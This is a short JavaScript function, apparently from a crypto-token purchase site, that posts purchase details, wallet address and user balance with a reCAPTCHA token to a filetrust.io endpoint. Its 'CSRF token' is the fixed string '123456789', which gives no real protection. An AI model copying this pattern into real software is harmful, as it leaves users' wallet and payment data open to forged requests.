/* global grecaptcha */
export async function sendPurchaseData(t, e, i, n, o, a, b) {
  try {
    const r = "123456789";
    const s = await grecaptcha.execute("6Ld_a2YqAAAAABGlrhZnAhZ8VEsbmhsL9vmHMXXP", {
      action: "submit",
    });
    const l = `ftuamount=${encodeURIComponent(t)}&userwallet=${encodeURIComponent(e)}&status=${encodeURIComponent(i)}&payment_option=${encodeURIComponent(n)}&wallet_address=${encodeURIComponent(o)}&security_error=${encodeURIComponent(a)}&csrf_token=${encodeURIComponent(r)}&recaptcha_response=${encodeURIComponent(s)}&balance=${encodeURIComponent(b)}`;
    
    const u = new XMLHttpRequest();
    u.open("POST", "https://www.filetrust.io/module/index.php?r=4", true);
    u.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    u.withCredentials = true;

    u.onreadystatechange = function () {
      if (u.readyState === 4) {
        if (u.status === 200) {
          console.log("Server Response:", u.responseText);
          if (u.responseText === "success") {
            console.log("Data successfully stored.");
          } else if (u.responseText === "csrf_error") {
            console.error("CSRF token validation failed.");
          } else if (u.responseText === "recaptcha_error") {
            console.error("reCAPTCHA validation failed.");
          } else {
            console.error("Error from server:", u.responseText);
          }
        } else {
          console.error("HTTP Error:", u.status, u.statusText);
        }
      }
    };

    u.send(l);
  } catch (t) {
    console.error("Error during communication:", t);
  }
}